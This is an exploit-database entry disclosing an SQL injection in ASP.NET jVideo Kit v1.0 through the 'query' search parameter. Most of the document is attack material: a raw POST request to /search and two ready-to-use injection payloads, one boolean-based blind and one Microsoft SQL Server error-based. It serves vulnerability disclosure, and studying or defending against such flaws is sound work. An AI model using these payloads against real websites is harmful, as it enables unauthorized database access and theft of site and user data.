ASP.NET jVideo Kit - 'query' SQL Injection

EDB-ID: 44739
Author: AkkuS
Published: 2018-05-24
Type: Webapps
Platform: ASP
Vulnerable App: N/A

 # Dork: N/A 
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage:
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'query' parameter. You can use the GET or POST

# PoC : SQLi :

# GET :[SQL]
# POST :
POST /search HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;

Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

# Vulnerable Payload :

Parameter: query (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: query=test%' AND 3923=3923 AND '%'='

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)
Payload: query=test%' AND 1603 IN (SELECT
(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN
(1603=1603) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='


Related Posts